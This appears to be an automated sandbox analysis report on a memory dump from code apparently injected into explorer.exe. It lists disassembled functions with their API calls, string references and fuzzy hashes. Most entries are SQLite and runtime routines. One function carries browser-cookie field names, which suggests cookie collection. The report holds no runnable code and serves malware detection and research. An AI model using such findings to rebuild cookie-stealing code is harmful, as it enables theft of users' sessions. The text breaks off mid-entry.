__swprintf_l.LIBCMT ref: 0E62A8C7

Strings

%03d, xrefs: 0E62AA9D
%06.3f, xrefs: 0E62AAC9
%04d, xrefs: 0E62A840
%.16g, xrefs: 0E62A8AB
%02d, xrefs: 0E62A87E

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: %.16g$%02d$%03d$%04d$%06.3f
API String ID: 1488884202-3831070334
Opcode ID: fa064fcaccfdae2354fc556153a922cff0a0d82c64a8799bb3ab5dfd31a70b5c
Instruction ID: ec3df0f9c816170c8b10e9fcad97ad9e4f28ca133be80c609953e1d55da09c05
Opcode Fuzzy Hash: fa064fcaccfdae2354fc556153a922cff0a0d82c64a8799bb3ab5dfd31a70b5c
Instruction Fuzzy Hash: 97C179A5714EA482CF28CB99F9143A827A1E7467E4F44473ECE6A5B7D0DA79C942CB00

Function 0E625BD0 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E627248
Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E627256
Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E62727F
Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E62728D
Part of subcall function 0E6271AC: GetProcessHeap.KERNEL32 ref: 0E627298
Part of subcall function 0E6271AC: HeapFree.KERNEL32 ref: 0E6272A6

Part of subcall function 0E627DE8: GetProcessHeap.KERNEL32 ref: 0E627E29
Part of subcall function 0E627DE8: HeapAlloc.KERNEL32 ref: 0E627E3B
Part of subcall function 0E627DE8: wcsftime.LIBCMT ref: 0E627E5D

Part of subcall function 0E6272C8: GetProcessHeap.KERNEL32 ref: 0E627334
Part of subcall function 0E6272C8: HeapFree.KERNEL32 ref: 0E627342

GetProcessHeap.KERNEL32 ref: 0E625CC2
HeapFree.KERNEL32 ref: 0E625CD0

Strings

httpOnly, xrefs: 0E625C9C
path, xrefs: 0E625C0E
value, xrefs: 0E625C86
secure, xrefs: 0E625C24
domain, xrefs: 0E625BF5
name, xrefs: 0E625C70
---, xrefs: 0E625C4B
expirationDate, xrefs: 0E625C55

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$Free$Allocwcsftime
String ID: ---$domain$expirationDate$httpOnly$name$path$secure$value
API String ID: 282520901-2802279535
Opcode ID: d1ec7490254d0102a1585410d62295d2732f6c7770b558e991a1515002d652b2
Instruction ID: fa0d0de08ab86cdc16c89be26a9863bdabc044b054ebf14ed446b3fc08d6d2b6
Opcode Fuzzy Hash: d1ec7490254d0102a1585410d62295d2732f6c7770b558e991a1515002d652b2
Instruction Fuzzy Hash: 21316976705A9580EB00EF66F984B4833A0E799FC4F84982B8E1D67759CF38C924CB84

Function 0E68BBB8 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 254COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E68BC24

Strings

vtable constructor did not declare schema: %s, xrefs: 0E68BDBC
hidden, xrefs: 0E68BE53
vtable constructor failed: %s, xrefs: 0E68BD33
vtable constructor called recursively: %s, xrefs: 0E68BC1D

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 2941638530-1299490920
Opcode ID: fd1bc7608252aba962cd553326b50a5238d327f27d9ab182e13482d9eb423ec4
Instruction ID: a15c1e0b999528bfdbe9c2fc46dc82de0e73233f1cc54704a384b3f95468e2b6
Opcode Fuzzy Hash: fd1bc7608252aba962cd553326b50a5238d327f27d9ab182e13482d9eb423ec4
Instruction Fuzzy Hash: 20A1BA76219B8486CB24EF26E55036EB7A1F345BD4F44862ADF9E47B68DB38C842C740

Function 0E67F8F8 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 212COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E67FA35
_cwprintf_s_l.LIBCMT ref: 0E67FAD8

Strings

column%d, xrefs: 0E67FA2E
false, xrefs: 0E67FA07
%.*z:%u, xrefs: 0E67FABB
true, xrefs: 0E67F9F4
rowid, xrefs: 0E67F9CC

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %.*z:%u$column%d$false$rowid$true
API String ID: 2941638530-3661680367
Opcode ID: 7fa71a178b43cdd5856277ee50160a21cfa7a5a827e7bd5a9498b029d748e505
Instruction ID: 4846bcd39c5aa812c898b8dcaed8c5e7e16a59c7d7795b0aadec806132bf1772
Opcode Fuzzy Hash: 7fa71a178b43cdd5856277ee50160a21cfa7a5a827e7bd5a9498b029d748e505
Instruction Fuzzy Hash: B7711562319B9091DF25DF26B920B296B96FB86FC4F895929CEDA07344EF38CD41C304

Function 0E67BCBC Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 126COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E67BD5E
_cwprintf_s_l.LIBCMT ref: 0E67BD8C

Strings

CREATE TABLE x, xrefs: 0E67BCFE
("%s", xrefs: 0E67BD80
,arg HIDDEN, xrefs: 0E67BDA0
%c"%s", xrefs: 0E67BD4E
,schema HIDDEN, xrefs: 0E67BDD0

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$CREATE TABLE x
API String ID: 2941638530-1792071301
Opcode ID: c9fa6860cb80aea7771500e6002ee90351d51ec80f6643827a84a0927192444b
Instruction ID: fa2f0980ad1953058c7223e95f2b82ea6b32b3b936dcfa7ca965d6cda555d8de
Opcode Fuzzy Hash: c9fa6860cb80aea7771500e6002ee90351d51ec80f6643827a84a0927192444b
Instruction Fuzzy Hash: B7513672214B8481DB21DF21F85039D77A1F749BD4F845A2ADAED037A8EF38C945CB40

Function 0E670E18 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E671073
__swprintf_l.LIBCMT ref: 0E6710B4

Strings

MZER, xrefs: 0E670E87
%!.15g, xrefs: 0E671058
%!.20e, xrefs: 0E6710A1
NULL, xrefs: 0E670ECD

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: %!.15g$%!.20e$MZER$NULL
API String ID: 1488884202-4030369070
Opcode ID: eb2b0b9b9b7a309cfc3d2e3dc318bdd4f4228e9a6137dcc0387e0c4a8718bb92
Instruction ID: af0278aa0bf0043447c92f897d238de350ba8fc8433a58cdba7e54fba0269093
Opcode Fuzzy Hash: eb2b0b9b9b7a309cfc3d2e3dc318bdd4f4228e9a6137dcc0387e0c4a8718bb92
Instruction Fuzzy Hash: C5712362215BC484DB22DF25E4503AD7BA1F796B90F48A716DE9D47398DF3ECA06C300

Function 0E648DC4 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E648D7F

Strings

%lld, xrefs: 0E648D74
(blob), xrefs: 0E648DFC
%.16g, xrefs: 0E648DAF
NULL, xrefs: 0E648DF0

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: %.16g$%lld$(blob)$NULL
API String ID: 2941638530-986291361
Opcode ID: f22c68f6cd2fea8ac68fee143df9f82b63fc6e2918f4eb671327fc0c9fcbf4a8
Instruction ID: 7c3b7b397cd90efe4b9d7d18890b00c55697740e934897a8e0b9ed774708f5ff
Opcode Fuzzy Hash: f22c68f6cd2fea8ac68fee143df9f82b63fc6e2918f4eb671327fc0c9fcbf4a8
Instruction Fuzzy Hash: 4F11E4A2726B10D0CF0DEB26F8543A86330B7257A8F945616EE3E172A4DB39CC87C340

Function 0E626914 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E626958
HeapReAlloc.KERNEL32 ref: 0E626972
wsprintfW.USER32 ref: 0E6269B3

Strings

true, xrefs: 0E626990
false, xrefs: 0E626999

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: false$true
API String ID: 659108358-2658103896
Opcode ID: d2e97d7cc66964dd0b1dd8210baa7692f9e77128809fa8e0403741c2ad73e2fd
Instruction ID: b480e5e47eb98f5854c1719aa42d1f3c7ea143687b18f95bc69f7243001cbd34
Opcode Fuzzy Hash: d2e97d7cc66964dd0b1dd8210baa7692f9e77128809fa8e0403741c2ad73e2fd
Instruction Fuzzy Hash: 19215832604B9697DB00CF15F84439C73B0F758B84F94442ADB5A97B24EF35E9A6CB40

Function 0E626B48 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 195memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0E626B8C
GetProcessHeap.KERNEL32 ref: 0E626BF1
HeapReAlloc.KERNEL32 ref: 0E626C0B
HeapAlloc.KERNEL32 ref: 0E626C17

Strings

null, xrefs: 0E626BA3
0123456789ABCDEF, xrefs: 0E626DB2, 0E626DD1

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Alloc$Processlstrlen
String ID: 0123456789ABCDEF$null
API String ID: 1993427828-3621651984
Opcode ID: 03bf1d6267366d96bf37183e72ae7e0875848426fd2cc9b41a90b2399189fec6
Instruction ID: be5c146250315884b9b2fe53385a7e7db5048e08e649b8419e58f1f1652e6f12
Opcode Fuzzy Hash: 03bf1d6267366d96bf37183e72ae7e0875848426fd2cc9b41a90b2399189fec6
Instruction Fuzzy Hash: 2A817BB6710B60A7DB14EF12E25066D3371F798B94F500529CB4A43B64DB39E9F2CB90

Function 0E68B9AC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E68BA86
_cwprintf_s_l.LIBCMT ref: 0E68BB22

Strings

CREATE VIRTUAL TABLE %T, xrefs: 0E68BA7F
name=%Q AND sql=%Q, xrefs: 0E68BB15
UPDATE %Q.sqlite_master SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d, xrefs: 0E68BAB7

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: CREATE VIRTUAL TABLE %T$UPDATE %Q.sqlite_master SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d$name=%Q AND sql=%Q
API String ID: 2941638530-1834655836
Opcode ID: e10d02f9abfc35bb29dd7913b7426c593d435399f87a20beb36b73245fe21023
Instruction ID: 96bd129d1db36235b8991d67cb7f617ef27669a2d9ae34f54d8c335c48926f5a
Opcode Fuzzy Hash: e10d02f9abfc35bb29dd7913b7426c593d435399f87a20beb36b73245fe21023
Instruction Fuzzy Hash: 0951AE7670078086DB24EF26E5543A937A0F789FC8F44452ACF4A1BB18DF38C816C748

Function 0E648C4B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E648C5F
_cwprintf_s_l.LIBCMT ref: 0E648CEB

Strings

,%s%s%s, xrefs: 0E648CE4
k(%d, xrefs: 0E648C53
BINARY, xrefs: 0E648C8D

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: ,%s%s%s$BINARY$k(%d
API String ID: 2941638530-1903017921
Opcode ID: 03e037e1d4798844b9a098240c421a4cec523d8aeec8f3e1a746d58723442db2
Instruction ID: d63ef7f61faec88e1b33e3efc7a1a02f1090830a6c029aef366ece1bc2bea2b9
Opcode Fuzzy Hash: 03e037e1d4798844b9a098240c421a4cec523d8aeec8f3e1a746d58723442db2
Instruction Fuzzy Hash: DB216B62714A95D0DF0ADF61FD5479863A0F724B88FC44816CE0D67664EB79C946C350

Function 0E6BDD94 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 0E6BDDF1
WideCharToMultiByte.KERNEL32 ref: 0E6BDECD
WriteFile.KERNEL32 ref: 0E6BDEF3
WriteFile.KERNEL32 ref: 0E6BDF32
GetLastError.KERNEL32 ref: 0E6BDF6A

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: f21000b7e796fce9ac4fd47f297a8b58df74841418c2ead7fab5dee03a0028d4
Instruction ID: 2e92466a98cad7d52d23fd07f341e3be80b8ba7c75946b53ea6119a65362d616
Opcode Fuzzy Hash: f21000b7e796fce9ac4fd47f297a8b58df74841418c2ead7fab5dee03a0028d4
Instruction Fuzzy Hash: 9651DE72720A9089E710CF75E8803ED3BB4F359B9CF088115DE5A5BB58DB39C586C700

Function 0E6C0AA4 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6C0AF5

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ec145869408d9b24f0ce45c1d2ce5335b0b267865e8d16d8a73bf751f7c65031
Instruction ID: 0f23d4944b19222b975076c8dd3419c21a6940e5e1c71e7e6cd93ef64ad651f2
Opcode Fuzzy Hash: ec145869408d9b24f0ce45c1d2ce5335b0b267865e8d16d8a73bf751f7c65031
Instruction Fuzzy Hash: D741F332218780C6CB648F25F4A4279BBA4FB52BA4F584329DFAA07794DB39C851C704

Function 0E623914 Relevance: 7.6, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E623957
HeapAlloc.KERNEL32 ref: 0E623969
GetProcessHeap.KERNEL32 ref: 0E6239D9
HeapAlloc.KERNEL32 ref: 0E6239EB
GetProcessHeap.KERNEL32 ref: 0E623A14
HeapFree.KERNEL32 ref: 0E623A22

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: db48302eed20ebdeccee4bdaa19b4f35b3f33b857b110d917d05c9474e493e63
Instruction ID: 8385dc4031d44dd68bbeb8645fcaa152fa105067d58fed8bf15c35fcc055571d
Opcode Fuzzy Hash: db48302eed20ebdeccee4bdaa19b4f35b3f33b857b110d917d05c9474e493e63
Instruction Fuzzy Hash: 5331CF31215B9286DB10CB26F81836A77A1EB4ABE0F184639DE5A43B54EF3DC806CB00

Function 0E626830 Relevance: 7.6, APIs: 6, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 0E626862
GetProcessHeap.KERNEL32 ref: 0E62687C
HeapAlloc.KERNEL32 ref: 0E62688E
MultiByteToWideChar.KERNEL32 ref: 0E6268DB
GetProcessHeap.KERNEL32 ref: 0E6268F4
HeapFree.KERNEL32 ref: 0E626902

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocByteCharFreeMultiWidelstrlen
String ID:
API String ID: 1845772836-0
Opcode ID: 223fade5a447255304440d8eac879b319bd920a62f4356431a91c1133846b526
Instruction ID: 9f194ad5c2c6899b0923c9bc4ca010fe73e664e25e5e12b0ab9585667f085120
Opcode Fuzzy Hash: 223fade5a447255304440d8eac879b319bd920a62f4356431a91c1133846b526
Instruction Fuzzy Hash: 0521AF36611F9186EB108F26F80432DB7A1FB95BA4F584439CE8A93B24EF3CD4418B10

Function 0E647844 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 272COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E647A3A

Strings

%s%s, xrefs: 0E647A28
x, xrefs: 0E647B2F
$, xrefs: 0E6478A2

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: $$%s%s$x
API String ID: 2941638530-2761044349
Opcode ID: cae053a90deb2be5f9d50ec389c71e4c5100dd7bc7cf0c4216380ce3b6cf0f9e
Instruction ID: aae980520b7fd579788aed81eb4674c747f66cf6257e47c1354137779ca257aa
Opcode Fuzzy Hash: cae053a90deb2be5f9d50ec389c71e4c5100dd7bc7cf0c4216380ce3b6cf0f9e
Instruction Fuzzy Hash: B4B106A2705B8089DB25CF36F4903AC3BA1EB4ABA8F08552ADF9D57754DF39D881C314

Function 0E662FC8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E663066

Strings

%Q%s, xrefs: 0E6631E8
"%w" , xrefs: 0E66305F

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: "%w" $%Q%s
API String ID: 2941638530-1987291987
Opcode ID: 9f8b7b1a548b828a3804a01fa3feda63f83e0a8dec6e0120bab5bd226db62cdf
Instruction ID: 478b11210da58a19b3f95293e0beb01a419aa796484a1bb96a5b8f5e79093136
Opcode Fuzzy Hash: 9f8b7b1a548b828a3804a01fa3feda63f83e0a8dec6e0120bab5bd226db62cdf
Instruction Fuzzy Hash: A2810372725B9086CE14CF16F850269B7A5F786BE0F444629DFAA07B98DF38D855CB00

Function 0E68A874 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 192COMMON

Download Yara Rule

Strings

%r , xrefs: 0E68AB2B
p, xrefs: 0E68A943
%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint, xrefs: 0E68AB44

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID:
String ID: %r $%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint$p
API String ID: 0-3371222869
Opcode ID: 57170a91ea0b2fcf3280d8095350824fa6592132257277059df7c8369fee4cca
Instruction ID: c5fb83e6f3547518894ae91155b46e72502ec66d275bd4e895f50bdd97dcf653
Opcode Fuzzy Hash: 57170a91ea0b2fcf3280d8095350824fa6592132257277059df7c8369fee4cca
Instruction Fuzzy Hash: 7981C172614B8086DB60EFA6F64079E77B5F349BD8F48821ADF9957B18DB38C891C700

Function 0E686D3C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0E686EFC

Strings

trigger, xrefs: 0E686DF4
type='trigger' AND name='%q', xrefs: 0E686EF2
INSERT INTO %Q.sqlite_master VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q'), xrefs: 0E686EC8

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: INSERT INTO %Q.sqlite_master VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')$trigger$type='trigger' AND name='%q'
API String ID: 2941638530-84837866
Opcode ID: e43615a15ceb2ab8a8dc3c6c51e537c0b4a0f9f018647123313b87ef4abcf15e
Instruction ID: 95a741b9244fd8917c608e37cefadf8d532f1c1bca8e7908cd4467c075183b6f
Opcode Fuzzy Hash: e43615a15ceb2ab8a8dc3c6c51e537c0b4a0f9f018647123313b87ef4abcf15e
Instruction Fuzzy Hash: 9751E062315B8082CE14EF26F66036D67A2F74AFC4F445A2ADF5A5BB18DF38C852C344

Function 0E630DE8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E630E78

Strings

%s-shm, xrefs: 0E630E71
readonly_shm, xrefs: 0E630F86
winOpenShm, xrefs: 0E630FCF

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 1488884202-2815843928
Opcode ID: f592f0726937901e75c50cae9b07656f842d0ac3f8180f27825d474dfa541f46
Instruction ID: 2a3801a9faeda5059b5f924d8e12700246b807785e6401b4190bcc66c751f85c
Opcode Fuzzy Hash: f592f0726937901e75c50cae9b07656f842d0ac3f8180f27825d474dfa541f46
Instruction Fuzzy Hash: D551BF3A701B8086DB54DF32F4A036D33A4FB55BA4F584A2ADE6A577A4DF38C859C340

Function 0E6AC900 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6AC92D
_invalid_parameter_noinfo.LIBCMT ref: 0E6ACB09

Strings

*, xrefs: 0E6ACA32
, xrefs: 0E6ACA87

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 8ff6d2332c836db3dd7d7b499d21f4ac2483bfcf503b27e520416d3786cec2b4
Instruction ID: 591b833665bf3445e83d5fe8b7fcf830b1aec0daa4c297679714a5c8cab1ed4e
Opcode Fuzzy Hash: 8ff6d2332c836db3dd7d7b499d21f4ac2483bfcf503b27e520416d3786cec2b4
Instruction Fuzzy Hash: D6519E7291A2548AC729CF39A1A417CBBA5F347F58B5C221ADB8652318CB35CC82CF54

Function 0E6AC6F0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6AC719
_invalid_parameter_noinfo.LIBCMT ref: 0E6AC8F6

Strings

*, xrefs: 0E6AC82A
, xrefs: 0E6AC87F

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: e617ae012fc52c8923c0b946f03791004ecf9f13b485bde04b431a1ab6a96d68
Instruction ID: da5b3d9e239c4b7e07f9235c9d28540e311a2814c0989d0921b8db3b832fb630
Opcode Fuzzy Hash: e617ae012fc52c8923c0b946f03791004ecf9f13b485bde04b431a1ab6a96d68
Instruction Fuzzy Hash: 47518F72D196408ADB298F39A06837CBFA0F746B68F5E121ACB4252359CB35CC86CF45

Function 0E6ACB14 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0E6ACB3B
_invalid_parameter_noinfo.LIBCMT ref: 0E6ACD0D

Strings

*, xrefs: 0E6ACC41
, xrefs: 0E6ACC96

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: c5369b1d1acde520051f7355c8406200c4ede355eee6778c6ecab0fc6fe7ce6b
Instruction ID: 2f13883b9afa12c5022097dd04befc26a065352941c7ecb1f0e53cebdb18e9ac
Opcode Fuzzy Hash: c5369b1d1acde520051f7355c8406200c4ede355eee6778c6ecab0fc6fe7ce6b
Instruction Fuzzy Hash: 08515973919650CADB288F39E0A836CBBA1F346B59F5C222ACB4746358C735CC82CF05

Function 0E6666DC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 0E6667E3

Strings

database %s is locked, xrefs: 0E6667CF
no such database: %s, xrefs: 0E666755
cannot detach database %s, xrefs: 0E666763

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: __swprintf_l
String ID: cannot detach database %s$database %s is locked$no such database: %s
API String ID: 1488884202-1259387423
Opcode ID: a9e96a8b537128cfa5f8a0395251e7e5db4ee858e17355762b8284d90bfafd50
Instruction ID: fcee35ba52f3f8bc6858c5423e9dd4a716ae5884a2b1bb83a6e5f94bec156839
Opcode Fuzzy Hash: a9e96a8b537128cfa5f8a0395251e7e5db4ee858e17355762b8284d90bfafd50
Instruction Fuzzy Hash: 00318976225A8086DB24CF16F494B5D3BB1F388BE4F85462AEE5E5B344DF39D886C340

Function 0E627DE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E627E29
HeapAlloc.KERNEL32 ref: 0E627E3B
wcsftime.LIBCMT ref: 0E627E5D

Strings

%d-%b-%Y %H:%M, xrefs: 0E627E53

Memory Dump Source

Source File: 00000009.00000002.4156898728.000000000E620000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E620000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_e620000_explorer.jbxd

Similarity

API ID: Heap$AllocProcesswcsftime
String ID: %d-%b-%Y %H:%M
API String ID: 4132867137-526061514
Opcode ID: af14f3205ef66b0517bc7e942630facd99bca4a0fc37d622f912a1caaf039054
Instruction ID: 23e9bc9b866f62f13850c7d425585acf300cf482625f54e03ba5acb18044b065
Opcode Fuzzy Hash: af14f3205ef66b0517bc7e942630facd99bca4a0fc37d622f912a1caaf039054
Instruction Fuzzy Hash: FDF0C26071274A82DE159B25F8183D963D1AB88BC0F88443ACE8D1B754EE3CEA85CB10

Function 0E627D14 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0E627D4E
HeapAlloc.KERNEL32 ref: 0E627D60
snprintf.LEGACY_STDIO_DEFINITIONS ref: 0E627D80

Strings

